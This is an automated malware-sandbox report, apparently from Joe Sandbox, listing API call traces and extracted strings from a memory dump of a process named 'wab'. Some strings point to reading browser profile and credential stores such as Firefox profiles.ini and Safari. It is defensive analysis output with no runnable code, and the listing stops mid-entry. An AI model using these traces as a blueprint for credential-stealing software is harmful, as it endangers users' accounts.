                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@
                                                  • String ID:
                                                  • API String ID: 1936579350-0
                                                  APIs
                                                  • EmptyClipboard.USER32 ref: 004098EC
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                  • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                  • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                  • GetLastError.KERNEL32 ref: 0040995D
                                                  • CloseHandle.KERNEL32(?), ref: 00409969
                                                  • GetLastError.KERNEL32 ref: 00409974
                                                  • CloseClipboard.USER32 ref: 0040997D
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                  • String ID:
                                                  • API String ID: 2565263379-0
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                  • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                  • API String ID: 2780580303-317687271
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                  • String ID:
                                                  • API String ID: 4218492932-0
                                                  APIs
                                                  • EmptyClipboard.USER32 ref: 00409882
                                                  • wcslen.MSVCRT ref: 0040988F
                                                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                  • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                  • memcpy.MSVCRT ref: 004098B5
                                                  • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                  • CloseClipboard.USER32 ref: 004098D7
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                  • String ID:
                                                  • API String ID: 2014503067-0
                                                  APIs
                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7726DF80,?,0041755F,?), ref: 00417452
                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                  • String ID: OsError 0x%x (%u)
                                                  • API String ID: 403622227-2664311388
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@memcpymemset
                                                  • String ID:
                                                  • API String ID: 1865533344-0
                                                  APIs
                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: NtdllProc_Window
                                                  • String ID:
                                                  • API String ID: 4255912815-0
                                                  APIs
                                                  • _wcsicmp.MSVCRT ref: 004022A6
                                                  • _wcsicmp.MSVCRT ref: 004022D7
                                                  • _wcsicmp.MSVCRT ref: 00402305
                                                  • _wcsicmp.MSVCRT ref: 00402333
                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                  • memset.MSVCRT ref: 0040265F
                                                  • memcpy.MSVCRT ref: 0040269B
                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                  • memcpy.MSVCRT ref: 004026FF
                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                  • API String ID: 577499730-1134094380
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                  • String ID: :stringdata$ftp://$http://$https://
                                                  • API String ID: 2787044678-1921111777
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                  • GetWindowRect.USER32(?,?), ref: 00414088
                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                  • GetDC.USER32 ref: 004140E3
                                                  • wcslen.MSVCRT ref: 00414123
                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                  • ReleaseDC.USER32(?,?), ref: 00414181
                                                  • _snwprintf.MSVCRT ref: 00414244
                                                  • SetWindowTextW.USER32(?,?), ref: 00414258
                                                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                  • GetClientRect.USER32(?,?), ref: 004142E1
                                                  • GetWindowRect.USER32(?,?), ref: 004142EB
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                  • GetClientRect.USER32(?,?), ref: 0041433B
                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                  • String ID: %s:$EDIT$STATIC
                                                  • API String ID: 2080319088-3046471546
                                                  APIs
                                                  • EndDialog.USER32(?,?), ref: 00413221
                                                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                  • memset.MSVCRT ref: 00413292
                                                  • memset.MSVCRT ref: 004132B4
                                                  • memset.MSVCRT ref: 004132CD
                                                  • memset.MSVCRT ref: 004132E1
                                                  • memset.MSVCRT ref: 004132FB
                                                  • memset.MSVCRT ref: 00413310
                                                  • GetCurrentProcess.KERNEL32 ref: 00413318
                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                  • memset.MSVCRT ref: 004133C0
                                                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                  • memcpy.MSVCRT ref: 004133FC
                                                  • wcscpy.MSVCRT ref: 0041341F
                                                  • _snwprintf.MSVCRT ref: 0041348E
                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                  • SetFocus.USER32(00000000), ref: 004134B7
                                                  Strings
                                                  • {Unknown}, xrefs: 004132A6
                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                  • API String ID: 4111938811-1819279800
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                  • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                  • EndDialog.USER32(?,?), ref: 0040135E
                                                  • DeleteObject.GDI32(?), ref: 0040136A
                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                  • ShowWindow.USER32(00000000), ref: 00401398
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                  • ShowWindow.USER32(00000000), ref: 004013A7
                                                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                  • String ID:
                                                  • API String ID: 829165378-0
                                                  APIs
                                                  • memset.MSVCRT ref: 00404172
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • wcscpy.MSVCRT ref: 004041D6
                                                  • wcscpy.MSVCRT ref: 004041E7
                                                  • memset.MSVCRT ref: 00404200
                                                  • memset.MSVCRT ref: 00404215
                                                  • _snwprintf.MSVCRT ref: 0040422F
                                                  • wcscpy.MSVCRT ref: 00404242
                                                  • memset.MSVCRT ref: 0040426E
                                                  • memset.MSVCRT ref: 004042CD
                                                  • memset.MSVCRT ref: 004042E2
                                                  • _snwprintf.MSVCRT ref: 004042FE
                                                  • wcscpy.MSVCRT ref: 00404311
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                  • API String ID: 2454223109-1580313836
                                                  APIs
                                                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                  • SetMenu.USER32(?,00000000), ref: 00411453
                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                  • memcpy.MSVCRT ref: 004115C8
                                                  • ShowWindow.USER32(?,?), ref: 004115FE
                                                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                  • API String ID: 4054529287-3175352466
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                  • API String ID: 3143752011-1996832678
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                  • API String ID: 667068680-2887671607
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                  • API String ID: 1607361635-601624466
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintf$memset$wcscpy
                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                  • API String ID: 2000436516-3842416460
                                                  APIs
                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                    • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                    • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                    • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                  • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                  • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                  • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                  • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                  • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                  • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                  • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                  • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                  • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                  • String ID:
                                                  APIs
                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                  • memset.MSVCRT ref: 0040E380
                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                  • wcschr.MSVCRT ref: 0040E3B8
                                                  • memcpy.MSVCRT ref: 0040E3EC
                                                  • memcpy.MSVCRT ref: 0040E407
                                                  • memcpy.MSVCRT ref: 0040E422
                                                  • memcpy.MSVCRT ref: 0040E43D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: ??2@??3@_snwprintfwcscpy
                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                  APIs
                                                  • memset.MSVCRT ref: 0040DBCD
                                                  • memset.MSVCRT ref: 0040DBE9
                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                    • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                    • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                    • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                  • wcscpy.MSVCRT ref: 0040DC2D
                                                  • wcscpy.MSVCRT ref: 0040DC3C
                                                  • wcscpy.MSVCRT ref: 0040DC4C
                                                  • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                  • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                  • wcscpy.MSVCRT ref: 0040DCC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                  • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                  APIs
                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                    • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                  • memset.MSVCRT ref: 0040806A
                                                  • memset.MSVCRT ref: 0040807F
                                                  • _wtoi.MSVCRT ref: 004081AF
                                                  • _wcsicmp.MSVCRT ref: 004081C3
                                                  • memset.MSVCRT ref: 004081E4
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                    • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                    • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
